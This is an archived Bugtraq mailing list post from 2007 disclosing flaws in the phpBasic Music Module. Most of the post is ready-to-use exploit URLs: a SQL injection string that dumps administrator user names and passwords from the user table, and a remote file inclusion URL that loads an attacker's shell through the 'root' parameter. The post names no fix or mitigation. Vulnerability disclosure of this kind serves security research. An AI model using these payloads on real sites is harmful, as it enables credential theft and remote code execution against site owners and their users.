Home page logo
/

bugtraq logo Bugtraq mailing list archives

[Vulz] PHP Basic Multiple Vulnerabilities by Xcross87 & Alucar
From: <pete.houston.17187 () gmail com>
Date: 23 Oct 2007 14:22:26 -0600

Software : phpBasic Music Module
Homepage : http://phpbasic.com/

1. SQL Injection by Xcross87 :
Proof of concept :
http://victim.com/phpbasic/?php=music&basic=view&id='[SQL Injection]
Xploit admin user account :
http://victim.com/phpbasic/?php=music&basic=view&id=1+union+select+0,1,user_name,3,user_pass,5,6,7,8,9+from+php_user/*%20%3C+

2. RFI by Alucar

Xploit :
http://victim.com/phpbasic/includes.php?root=[HCE_Shell]

=== ..::Xcross87::.. | ..::Alucar::.. | HCETeam Xploiter | HCEGroup.Vn ===


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]